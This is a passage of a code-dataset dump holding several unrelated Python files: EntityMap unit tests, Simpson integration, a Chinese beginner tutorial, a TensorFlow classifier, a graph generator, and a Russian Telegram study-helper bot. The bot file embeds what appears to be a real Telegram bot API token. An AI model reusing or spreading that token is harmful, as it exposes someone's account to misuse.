self.assertEqual(output, project_entity)\n\n def test_get_project__returns_none(self):\n # given\n entity_map = EntityMap()\n\n # when\n output = entity_map.get_project()\n\n # then\n self.assertEqual(output, None)\n\n def test_add_entity(self):\n # given\n entity_map = EntityMap()\n content = {'key': 'val'}\n entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n spreadsheet_location={})\n # when\n entity_map.add_entity(entity)\n\n # then\n saved_entity = entity_map.get_entity('protocol', 'protocol-uuid')\n self.assertFalse(saved_entity.is_reference)\n self.assertFalse(saved_entity.is_linking_reference)\n self.assertEqual(saved_entity.content, content)\n\n def test_add_entity__when_added_as_reference_entity_first__then_set_entity_as_linking_reference(self):\n # given\n entity_map = EntityMap()\n content = {'key': 'val'}\n entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n is_reference=True,\n spreadsheet_location={})\n entity_map.add_entity(entity)\n\n # when\n new_entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n is_linking_reference=True,\n spreadsheet_location={})\n entity_map.add_entity(new_entity)\n\n # then\n saved_entity = entity_map.get_entity('protocol', 'protocol-uuid')\n self.assertTrue(saved_entity.is_reference, 'The entity must be set as reference entity')\n self.assertTrue(saved_entity.is_linking_reference, 'The entity must be also set as a linking reference entity')\n self.assertEqual(saved_entity.content, content, 'The content must not be touched')\n\n def test_add_entity__when_added_as_linking_reference_entity_first__then_set_as_reference_and_copy_new_content(self):\n # given\n entity_map = EntityMap()\n content = {'key': 'val'}\n entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=content,\n is_linking_reference=True,\n spreadsheet_location={})\n entity_map.add_entity(entity)\n\n # when\n new_content = {'key': 'val2'}\n new_entity = Entity(entity_type='protocol',\n entity_id='protocol-uuid',\n content=new_content,\n is_reference=True,\n spreadsheet_location={})\n entity_map.add_entity(new_entity)\n\n # then\n saved_entity = entity_map.get_entity('protocol', 'protocol-uuid')\n self.assertTrue(saved_entity.is_linking_reference, 'The entity must be set as a linking reference entity')\n self.assertTrue(saved_entity.is_reference, 'The entity must be set as reference entity')\n self.assertEqual(saved_entity.content, new_content, 'The content must be updated')\n","repo_name":"ebi-ait/ingest-client","sub_path":"tests/unit/importer/submission/test_entity_map.py","file_name":"test_entity_map.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22624958160","text":"import math as m\n\na = 0\nb = 1\n\ndef func(x):\n return x * x * m.sin(x)\n\ndef simpson(a, b, n):\n h = (b - a) / n\n summ = func(a) + func(b)\n even = 0\n odd = 0\n for i in range(1, n-1):\n if i % 2 == 0:\n even += func(a + i*h)\n else:\n odd += func(a + i*h)\n summ += (2 * even + 4 * odd)\n I = (h/3) * summ\n return I\n\nprint(\"\"\"\nЧисленное интегрирование: метод Симпсона\nОпределенный интеграл x^2 * sinx, [0;1]\n\"\"\")\n\n\nn = 6\nprint(\"При n = 6:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n\nn = 12\nprint(\"При n = 12:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n\nn = 60\nprint(\"При n = 60:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n\nn = 600\nprint(\"При n = 600:\")\nans = simpson(a, b, n)\nprint(\"Ответ: {}\".format(ans))\n","repo_name":"keshapou/labs","sub_path":"numerical_methods/Integrals/simpson.py","file_name":"simpson.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14379344285","text":"#python得语句\n#赋值语句\n#判断语句 if/elif/else判断语句\n# a =int(input(\"请输入你的年龄:\"))\n# if a > 18:\n# print(\"成年了\")\n# elif a > 10: #如果A得值小于或者等于并且A > 10 (10.18)\n# print(\"未成年\")\n# elif a > 5:\n# print(\"奶娃娃\")\n# else:\n# print(\"花一样得年纪\")\n\n\n\n#如果if满足条件去执行pritn 如果不满足if 继续执行下面得elif\n\n\n\n\n#示范if else\na = 9\nb = 9\nif a < 10:\n print(\"大于十\")\n if b < 5:\n print(\"大儿子\")\n else:\n if b > 10:\n print(\"等待\")\n else:\n print(\"小于大大\")\nelse:\n print(\"大大大\")\n\n\n#if的条件\n# > :数字比较,a > b 如果a大于b条件成立\n# <:数字比较\n# >=:数字比较\n# <=:数字比较\n# ==;两个值是否相等,int/str/tuple/list/dict\n# !=:两个值不相等,int/str/tuple/list/dict\n# in: 判断一个值是否包含在另外一个值中\n# not in:判断一个值是否包含在另外一个值中\n# is :\n# is not :\n\n#in和notin的用法\na = \"大\"\nb = \"大蟒蛇\"\nif a in b :\n print(\"好大一个蟒蛇\")\n\nelse:\n print(\"好小一个蟒蛇\")\n\n\na = \"大\"\nb = \"大蟒蛇\"\nif a not in b :\n print(\"好大一个蟒蛇\")\n\nelse:\n print(\"好小一个蟒蛇\")\n\n\n\n#is is not 的用法\nif \"好大\" is True: #类型和值是否一致 0假1真\n print(\"顶顶顶顶\")\nelse:\n print(\"卡布角落\")\n\n\nif \"好大\" is not True: #类型和值是否一致\n print(\"顶顶顶顶\")\nelse:\n print(\"卡布角落\")\n\n\n# 循环语句for/while\n#遍历:字符串,数组,元组,字典:\nz = \"只是来之上海的10K工资\"\nfor i in z: #取值\n print(i)\nb = [\"4\",\"5\",\"6\",\"5\",\"大大大大大大大\"] \nm = (\"4\",\"5\",\"6\",\"5\",\"大大大大大大大\")\nfor i in b:\n print(i)\n\n\n#字典遍历\na = {\"字典\":\"大字典\",\"小指点\":\"ddd\"}\nfor v in a:\n print(v,a[v]) #a[\"字典\"] v=\"字典\" > a[v] \n\n\n#range:序列生成器:快速生成一个数值\nrange(10) #[0123456798]\n\nfor jj in range(10):\n print(jj)\n\n\n#range (开始值,结束值,步长)到结束值,不包含结束值\n\n\nfor jj in range(2,11,2): #会取值2 4 6 8 10 前面一个数字是 从第几位数字开始 中间数字11 代表总共取值 最后一位2 代表,每取值一次,跳过两位数值 \n print(jj)\n","repo_name":"Gratuler/zhushi","sub_path":"demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5914753480","text":"import tensorflow as tf\n\n##\nfrom constant.constant import EMBEDDING_SIZE\n\n\nclass NN:\n def __init__(self):\n # 参数设置\n self.training_batch_size = 128\n self.valid_batch_size = 256\n self.iteration = 100000\n # embediing size\n self.input_size = EMBEDDING_SIZE\n # accu_size = 203\n self._output_size = 4\n # 多标签预测返回的个数\n self.multi_label_count = 3\n # 图\n self._graph = tf.Graph()\n\n # 建立模型相关量\n self._x, self._y, self._keep_prob = self.build_placeholder()\n self.row_prediction = self.build_model()\n #下面是对于单标签分类的代码\n self.loss = self.build_one_lebal_loss()\n self._train_op = self.build_train_op()\n self.result = self.get_one_result()\n self.accuracy = self.one_result_accuracy()\n # 下面是对多标签分类的代码\n # self.loss = self.build_muti_lebal_loss()\n # self._train_op = self.build_train_op()\n # self._result_value, self._result_index = self.get_multi_result()\n\n # 增加一层神经网络的抽象函数\n def _add_layer(self, layerName, inputs, in_size, out_size, activation_function=None):\n # add one more layer and return the output of this layer\n with tf.variable_scope(layerName, reuse=None):\n Weights = tf.get_variable(\"weights\", shape=[in_size, out_size],\n initializer=tf.truncated_normal_initializer(stddev=0.1))\n biases = tf.get_variable(\"biases\", shape=[1, out_size],\n initializer=tf.truncated_normal_initializer(stddev=0.1))\n\n Wx_plus_b = tf.matmul(inputs, Weights) + biases\n tf.add_to_collection(tf.GraphKeys.WEIGHTS, Weights)\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n\n # 返回训练时需要传入的 placeholder 的值\n def build_placeholder(self):\n with self._graph.as_default():\n x = tf.placeholder(tf.float32, [None, self.input_size])\n y = tf.placeholder(tf.float32, [None, self.output_size])\n # dropout操作,减少过拟合,其实就是降低上一层某些输入的权重scale,甚至置为0,升高某些输入的权值,甚至置为2,防止评测曲线出现震荡,个人觉得样本较少时很必要\n # 使用占位符,由dropout自动确定scale,也可以自定义,比如0.5,根据tensorflow文档可知,程序中真实使用的值为1/0.5=2,也就是某些输入乘以2,同时某些输入乘以0\n keep_prob = tf.placeholder(tf.float32)\n\n return x, y, keep_prob\n\n # 建立这个模型\n # 返回值为之后的输出向量,shape为 batch_size * output_size\n def build_model(self):\n with self._graph.as_default():\n # 添加隐藏层1\n l1 = self._add_layer(\"layer1\", self.x, self.input_size, 64, activation_function=tf.sigmoid)\n # 添加隐藏层2\n l2 = self._add_layer(\"layer2\", l1, 64, 128, activation_function=tf.sigmoid)\n l2_drop = tf.nn.dropout(l2, self._keep_prob)\n # 添加输出层\n prediction = self._add_layer(\"layer3\", l2_drop, 128, self.output_size, activation_function=tf.identity)\n\n return prediction\n\n # 建立单结果预测的损失函数\n def build_one_lebal_loss(self):\n with self.graph.as_default():\n cross_entropy = tf.reduce_sum(\n tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=self.row_prediction))\n reg_term = self._build_regular_term()\n loss = cross_entropy + reg_term\n\n return loss\n\n def _build_regular_term(self):\n with self.graph.as_default():\n regularizer = tf.contrib.layers.l2_regularizer(scale=0.001)\n reg_term = tf.contrib.layers.apply_regularization(regularizer)\n return reg_term\n\n # 建立多结果预测的损失函数\n def build_muti_lebal_loss(self):\n with self.graph.as_default():\n cross_entropy = tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits(labels=self.y, logits=self.row_prediction))\n reg_term = self._build_regular_term()\n loss = cross_entropy + reg_term\n\n return loss\n\n # 建立训练张量\n def build_train_op(self):\n with self.graph.as_default():\n train_op = tf.train.AdamOptimizer(beta2=0.9999).minimize(self.loss)\n\n return train_op\n\n # 拟合数据集\n def get_one_result(self):\n with self.graph.as_default():\n soft_max = tf.nn.softmax(self.row_prediction)\n result = tf.argmax(soft_max, 1)\n\n return result\n\n # 得到单标签准确度\n def one_result_accuracy(self):\n with self.graph.as_default():\n soft_max = tf.nn.softmax(self.row_prediction)\n correct_prediction = tf.equal(tf.argmax(soft_max, 1), tf.argmax(self.y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n return accuracy\n\n def get_multi_result(self):\n with self.graph.as_default():\n soft_max = tf.nn.softmax(self.row_prediction)\n # value -> 对应的是 top k 的概率值\n # index -> 对应的是 top k 的下标\n # 举个例子 [1,5,2,4,6] top 2 : value -> [6, 5] index -> [4,1]\n value, index = tf.nn.top_k(soft_max, k=self.multi_label_count)\n\n return value, index\n\n @property\n def graph(self):\n return self._graph\n\n @property\n def x(self):\n return self._x\n\n @property\n def y(self):\n return self._y\n\n @property\n def keep_prob(self):\n return self._keep_prob\n\n @property\n def train_op(self):\n return self._train_op\n\n @property\n def output_size(self):\n return self._output_size\n","repo_name":"TsNFs/SecretProject","sub_path":"nn/nn_model.py","file_name":"nn_model.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13636220944","text":"#Creates a fabricated graph of size n which follows linearly from the first nodeall the way to the nth node in a single path\n\n#Check to see shape of fitness vs. eigenvector centrality plot.\n\nimport sys\n\nbase = int(sys.argv[1])\nnum_nodes = 2**base\n\nfor i in range(0,num_nodes-1):\n print(str(i) + \";\" + str(i+1))\nprint(str(num_nodes-1) + \";\" + str(num_nodes-1))\n\n","repo_name":"thomasgreen79/Landscape_Vis","sub_path":"Binary_Hypergraphs/special_cases/make_direct_path_graph.py","file_name":"make_direct_path_graph.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37837838980","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport telebot\n\n\nbot = telebot.TeleBot(\"5863278624:AAFW5zXpffCSA9qSpAhVUMf0TG3Huq3o4iM\")\n\n\n@bot.message_handler(commands=[\"start\"])\ndef start(message):\n mess = f\"Привет,{message.from_user.first_name} {message.from_user.last_name} \\n\" \\\n f\"Я помощник по твоему обучению я.п. Python. И мой создатель развивает меня в этом направлении.\"\n bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n mess = f\"Привет,{message.from_user.first_name} \" \\\n f\"На данный момент я знаю, что такое: \" \\\n f\"\\n if-elif-else\\n While \\n break \\n continue \\n Range\\n For \\n Вложенные циклы \\n\" \\\n f\"Словари\\n Кортежи\\n Списки\\n Строки\\n Множества\\n Типы данных\\n Работа с файлами\\n Исключения\\n\" \\\n f\"def(функции)\\n Рекурсия\\n *args\\n **kwargs\\n enumerate() \\n List comprehension\\n lambda функции\\n map \" \\\n f\"\\n Замыкания\\n Декораторы \\n Модули и пакеты \\n Виртуальные окружения \\n Установка пакетов в python\\n\" \\\n f\"JSON данные \\n CLI \\n Переменные окружения \\n Pathlib \\n Работа с SQlite3 в Python \\n pep8 \\n Срезы \\n \" \\\n f\"Я помогу тебе. Для этого введи одно из вышеперечисленных слов или словосочетаний. И я вышлю \" \\\n f\"вспомогательный материал. \"\n bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler(commands=[\"help2\"])\ndef help2(message):\n mess = f\"Привет,{message.from_user.first_name}\\n\" \\\n f\"У меня есть ещё пара команд: Методички, Задания, Методичка (её номер) \"\n bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler()\ndef get_user_text(message):\n if message.text == \"Hello\" or message.text == \"Привет\":\n bot.send_message(message.chat.id, \"И тебе привет!\", parse_mode=\"html\")\n elif message.text == \"Отдохнуть бы!\":\n bot.send_message(message.chat.id, f\"Послушай и отдохни\\n\", parse_mode=\"html\")\n bot.send_audio(message.chat.id, open(r\"c:/Users/admin/downloads/Nirvana.mp3\", \"rb\"))\n elif message.text == \"id\":\n bot.send_message(message.chat.id, f\"Твой ID: {message.from_user.id}\", parse_mode=\"html\")\n elif message.text == \"Срезы\":\n bot.send_message(message.chat.id,\n \"Изучай: https://habr.com/ru/post/587282/ \\n \"\n \"Ещё ссылка: https://proproprogs.ru/python_base/spiski-srezy-i-metody \\n \", parse_mode=\"html\")\n elif message.text == \"pep8\" or message.text == \"Pep8\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/osnovy/pep-8-rukovodstvo-po-napisaniyu-koda-na-python.html\"\n \" \\n Ссылка на видео: https://www.youtube.com/watch?v=pAJO25vJneQ \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=qBSYKHXVgf0 \", parse_mode=\"html\")\n elif message.text == \"Работа с SQlite3 в Python\" or message.text == \"SQlite3\":\n bot.send_message(message.chat.id,\n \"Изучай: https://python-scripts.com/pathlib \\n Ссылка на видео: https://www.youtube.com/watch?v=K1C5JAo7cMU \\n \"\n \"Часть 2: https://www.youtube.com/watch?v=gm0p517EG7o \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=fs7xrH2975U \", parse_mode=\"html\")\n elif message.text == \"Pathlib\" or message.text == \"pathlib\":\n bot.send_message(message.chat.id,\n \"Изучай: https://python-scripts.com/pathlib \\n Ссылка на видео: https://www.youtube.com/watch?v=wZvk8nyPQCY \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=DOgjN7RmHds\", parse_mode=\"html\")\n elif message.text == \"Переменные окружения\":\n bot.send_message(message.chat.id,\n \"Изучай: https://lumpics.ru/environment-variables-in-windows-10/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=L9-I4NibguY \\n \", parse_mode=\"html\")\n elif message.text == \"CLI\" or message.text == \"Интерфейс командной строки\":\n bot.send_message(message.chat.id,\n \"Изучай: https://tproger.ru/translations/python-command-line-tools-with-click/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=vm9tOamPkeQ \\n \", parse_mode=\"html\")\n elif message.text == \"JSON данные\" or message.text == \"JSON\":\n bot.send_message(message.chat.id,\n \"Изучай: https://dvmn.org/encyclopedia/modules/json/ \\n Ссылка на видео: https://www.youtube.com/watch?v=rIhygmw9HZM \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=3xaN1tDdkF4\", parse_mode=\"html\")\n elif message.text == \"Установка пакетов в Python\" or message.text == \"Виртуальные окружения\":\n bot.send_message(message.chat.id,\n \"Изучай: https://habr.com/ru/post/491916/ \\n Ссылка на видео: https://www.youtube.com/watch?v=xSsKtIiUaOY \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=rsG1Y5k-9jo\", parse_mode=\"html\")\n elif message.text == \"Декораторы\" or message.text == \"Wraps\":\n bot.send_message(message.chat.id,\n \"Изучай: https://dev-gang.ru/article/ljambdafunkcija-v-python-fe2p8vf789/ \\n Ссылка на видео: https://www.youtube.com/watch?v=Va-ovLxHmus \\n \"\n \"Часть 2: https://www.youtube.com/watch?v=tj8EiBK8TeA\", parse_mode=\"html\")\n elif message.text == \"Модули и пакеты\" or message.text == \" __init__\":\n bot.send_message(message.chat.id,\n \"Изучай: https://devpractice.ru/python-lesson-13-modules-and-packages/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=VCRxOdCueqM \", parse_mode=\"html\")\n elif message.text == \"Замыкания\" or message.text == \"Closure\":\n bot.send_message(message.chat.id,\n \"Изучай: https://advpyneng.readthedocs.io/ru/latest/book/07_closure/closure.html \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=lA979PBb0TY \", parse_mode=\"html\")\n elif message.text == \"Функция map\" or message.text == \"map\":\n bot.send_message(message.chat.id,\n \"Изучай: https://egoroffartem.pythonanywhere.com/course/python/funktsiya-map-python \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=2ghKShXWuSs \", parse_mode=\"html\")\n elif message.text == \"lambda\" or message.text == \"lambda функции\":\n bot.send_message(message.chat.id,\n \"Изучай: https://dev-gang.ru/article/ljambdafunkcija-v-python-fe2p8vf789/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=8fzrm1tX5lI \", parse_mode=\"html\")\n elif message.text == \"List comprehension\" or message.text == \"Списковые включения\":\n bot.send_message(message.chat.id,\n \"Изучай: https://egoroffartem.pythonanywhere.com/course/python/generatori-spiskov-python-list-comprehension \\n Ссылка на видео: https://www.youtube.com/watch?v=_zBTBr6XdZo \\n\"\n \"Часть 2: https://www.youtube.com/watch?v=_RA35zG-0gA \\n \"\n \"Часть 3: https://www.youtube.com/watch?v=vn6bV6BYm7w\", parse_mode=\"html\")\n elif message.text == \"enumerate()\" or message.text == \"enumerate\":\n bot.send_message(message.chat.id,\n \"Изучай: https://proproprogs.ru/python_base/funkciya-enumerate-primery-ispolzovaniya \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=Hz1lDs69cCs \", parse_mode=\"html\")\n elif message.text == \"*args\" or message.text == \"**kwargs\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pavel-karateev.gitbook.io/intermediate-python/sintaksis/args_and_kwargs \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=mcAB5dBXMp4 \", parse_mode=\"html\")\n elif message.text == \"Рекурсия\" or message.text == \"рекурсивные вызовы\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythontutor.ru/lessons/functions/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=jvFULnNpNLg \\n\"\n \"Часть 2: https://www.youtube.com/watch?v=rzGCxtZdMuM \", parse_mode=\"html\")\n elif message.text == \"def(функции)\" or message.text == \"def\" or message.text == \"Функции\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/vse-o-funkciyax-i-ix-argumentax.html \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=DJAlfolEv9A\", parse_mode=\"html\")\n elif message.text == \"if-elif-else\" or message.text == \"проверка истинности\" or message.text == \"if/else\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/osnovy/instrukciya-if-elif-else-proverka-istinnosti-trexmestnoe-vyrazhenie-ifelse.html\"\n \"\\n Ссылка на видео: https://www.youtube.com/watch?v=EggJRTzid1M\\n \"\n \"Часть 2: https://www.youtube.com/watch?v=8YshxYHIeeI \\n \"\n \"Часть 3: https://www.youtube.com/watch?v=8F-EfhsKHCI\", parse_mode=\"html\")\n elif message.text == \"While\" or message.text == \"break\" or message.text == \"continue\":\n bot.send_message(message.chat.id,\n \"Изучай: https://www.youtube.com/watch?v=Ll3AN1FXXfE \\n \"\n \"Часть 2: https://www.youtube.com/watch?v=Myh7OdxoYsA\", parse_mode=\"html\")\n elif message.text == \"Range\" or message.text == \"Функция range\":\n bot.send_message(message.chat.id, \"Ссылка на видео: https://www.youtube.com/watch?v=9J0fvF4k4F4\",\n parse_mode=\"html\")\n elif message.text == \"Вложенные циклы Python\":\n bot.send_message(message.chat.id, \"Ссылка на видео: https://www.youtube.com/watch?v=tsVgSwSdsa8\",\n parse_mode=\"html\")\n elif message.text == \"For\" or message.text == \"Цикл for\":\n bot.send_message(message.chat.id, \"Изучай: https://www.youtube.com/watch?v=iopPsTT7Pes\", parse_mode=\"html\")\n elif message.text == \"Кортежи\" or message.text == \"кортежи\" or message.text == \"кортеж\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/kortezhi-tuple.html\" \"Ссылка на видео:\",\n parse_mode=\"html\")\n elif message.text == \"Словари\" or message.text == \"Словарь\" or message.text == \"словарь\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/slovari-dict-funkcii-i-metody-slovarej.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=7_Zrh1--d5o\", parse_mode=\"html\")\n elif message.text == \"Лист\" or message.text == \"Список\" or message.text == \"Списки\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/spiski-list-funkcii-i-metody-spiskov.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=CEQZYZMPJSU\", parse_mode=\"html\")\n elif message.text == \"Строки\" or message.text == \"Функции и методы строк\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/stroki-funkcii-i-metody-strok.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=GmMD6gQYWe4\", parse_mode=\"html\")\n elif message.text == \"Множества\" or message.text == \"set\" or message.text == \"frozenset\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/mnozhestva-set-i-frozenset.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=KMGRXDxUw18\", parse_mode=\"html\")\n elif message.text == \"Типы данных\" or message.text == \"Тип данных питон\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/chisla-int-float-complex.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=DZvNZ9l9NT4\", parse_mode=\"html\")\n elif message.text == \"Работа с файлами\" or message.text == \"файлы\" or message.text == \"Файлы\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/fajly-rabota-s-fajlami.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=oRr_bEXJbV0\", parse_mode=\"html\")\n elif message.text == \"Исключения\" or message.text == \"try\" or message.text == \"expect\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/isklyucheniya-v-python-konstrukciya-try-except-dlya-obrabotki-isklyuchenij.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=qjqbek5tG3A\", parse_mode=\"html\")\n elif message.text == \"Я Виталий Горшков\" or message.text == \"я Горшков\" or message.text == \"Я Горшков\":\n bot.send_message(message.chat.id, \"ВИТАЛИК, ИДИ БЫСТРО УЧИСЬ И НЕ ЛЕНИСЬ!\", parse_mode=\"html\")\n elif message.text == \"Методичка 15\" or message.text == \"Задание 15\" or message.text == \"Методичка 2.20\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.20 (15).pdf\", \"rb\"), )\n elif message.text == \"Методичка 14\" or message.text == \"Задание 14\" or message.text == \"Методичка 2.19\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.19 (14).pdf\", \"rb\"))\n elif message.text == \"Методичка 13\" or message.text == \"Задание 13\" or message.text == \"Методичка 2.18\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.18 (13).pdf\", \"rb\"))\n elif message.text == \"Методичка 12\" or message.text == \"Задание 12\" or message.text == \"Методичка 2.17\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.17 (12).pdf\", \"rb\"))\n elif message.text == \"Методичка 11\" or message.text == \"Задание 11\" or message.text == \"Методичка 2.16\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.16 (11).pdf\", \"rb\"))\n elif message.text == \"Методичка 10\" or message.text == \"Задание 10\" or message.text == \"Методичка 2.15\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.15 (10).pdf\", \"rb\"))\n elif message.text == \"Методичка 9\" or message.text == \"Задание 9\" or message.text == \"Методичка 2.14\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.14 (9).pdf\", \"rb\"))\n elif message.text == \"Методичка 8\" or message.text == \"Задание 8\" or message.text == \"Методичка 2.13\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.13 (8).pdf\", \"rb\"))\n elif message.text == \"Методичка 7\" or message.text == \"Задание 7\" or message.text == \"Методичка 2.12\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.12 (7).pdf\", \"rb\"))\n elif message.text == \"Методичка 6\" or message.text == \"Задание 6\" or message.text == \"Методичка 2.11\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.11 (6).pdf\", \"rb\"))\n elif message.text == \"Методичка 5\" or message.text == \"Задание 5\" or message.text == \"Методичка 2.10\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.10 (5).pdf\", \"rb\"))\n elif message.text == \"Методичка 4\" or message.text == \"Задание 4\" or message.text == \"Методичка 2.9\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.9 (4).pdf\", \"rb\"))\n elif message.text == \"Методичка 3\" or message.text == \"Задание 3\" or message.text == \"Методичка 2.8\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.8 (3).pdf\", \"rb\"))\n elif message.text == \"Методичка 2\" or message.text == \"Задание 2\" or message.text == \"Методичка 2.7\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.7 (2).pdf\", \"rb\"))\n elif message.text == \"Методичка 1\" or message.text == \"Задание 1\" or message.text == \"Методичка 2.6\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.6 (1).pdf\", \"rb\"))\n elif message.text == \"Методички\" or message.text == \"Задания\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.20 (15).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.19 (14).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.18 (13).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.17 (12).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.16 (11).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.15 (10).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.14 (9).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.13 (8).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.12 (7).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.11 (6).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.10 (5).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.9 (4).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.8 (3).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.7 (2).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.6 (1).pdf\", \"rb\"))\n\n else:\n bot.send_message(message.chat.id,\n \"Извини, я тебя не понимаю. Напиши, пожалуйста, /help или /help2, для отображения моего \"\n \"функционала.\",\n parse_mode=\"html\")\n\n\nbot.polling(none_stop=True)\n","repo_name":"ItsMyLife1337/ForPetProject","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":20630,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12464104547","text":"from tqdm import tqdm_gui\nfrom tqdm import tqdm\nimport time\nimport sys\n\ntoolbar_width = 40\n\n# setup toolbar\nsys.stdout.write(\"[%s]\" % (\" \" * 